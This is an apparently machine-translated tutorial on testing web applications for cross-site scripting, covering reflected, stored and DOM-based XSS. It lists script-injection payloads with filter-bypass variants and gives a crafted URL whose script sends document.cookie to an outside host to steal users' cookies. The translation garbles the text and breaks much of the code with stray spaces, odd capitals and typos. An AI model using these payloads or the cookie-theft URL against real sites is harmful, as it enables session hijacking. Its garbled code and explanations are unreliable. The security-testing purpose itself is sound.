Security Test-cross-site scripting (xss)

Security Test-cross-site scripting (xss)

Cross-site scripting (XSS) is an important and common security vulnerability. XSS indicates malicious code input. If the program does not verify the input and output, the browser will be controlled by attackers. Users can obtain cookie, system, and browser information. Saved xss can also be used for phishing to obtain more user information.

The most common cross-site scripting method, input

<Script> alert (1) </script>

And its variants

<Script> alert (1) </script> entity

% 3 Cscript % 3 Ealert (1) % 3C/script % 3E URL Encoding

<Scr <script> EPT> alert (1) <scr <script> EPT>

<Script x = 1> alert (1) </script x = 1>

Or <script> confirm (1) </script>

<Javascript.: alert (1)>;

If a warning box is displayed on the page after submission, the page has the xss vulnerability.

* Reflected xss

In general, even if you enter a piece of code, you can see the actual effect of the Code, rather than the effect of the original program.

For example, a piece of code

<Html> <body>

<Script>

Document. write (location. search); </script> // What is the url returned by location. search? Start part

</Body>

When you enter the following url

"Http: // 127.0.0.1/attrck.html? Search = 222"

The page displays :? Search = 222; however, if you enter

/? Search = <Script> alert (1) </script>

The actual code of the page is:

Document. write (? Search =) <Script> alert (1) </script>;

A warning box is displayed, that is, the Code <Script> alert (1) </script> is executed, not displayed on the page? Effect of the suffix string

You can use a forged url to obtain user cookies.

 

For example, add document. cookie = ("name = 123"); in Example 1, set the cookie, and construct the url as follows to pass the cookie in the localhost domain to and search

 

Http: // 127.0.0.1/attrck.html? Search = <script> window. open ("http://www.baidu.com/s? Wd = "+ document. cookie) </script>

Because cookies prohibit cross-origin access, but the forged url, the browser will think it is a localhost domain

* Saved xss

Stores malicious code on the server. For example, if a malicious code is published, other users execute malicious scripts during browsing.

* Dom-based xss

Strictly speaking, this xss is also reflective. The example in this article is also dom based, which refers to modifying the dom object model of the page to launch an attack. For example, the page uses document. write \ document. dom methods such as writeln \ innerhtml may cause dom based xss

Manual input is generally used to search for xss vulnerabilities. You need to consider input restrictions, filtering, length restrictions, and other factors. Therefore, you need to design a variety of input variants to achieve the test effect. You can also use tools, for example, burpsuite can manually modify the request parameters after obtaining the request, and then resubmit the request to the browser for testing. Because xss is not limited to visible page input, it may also be hiding form fields and get request parameters.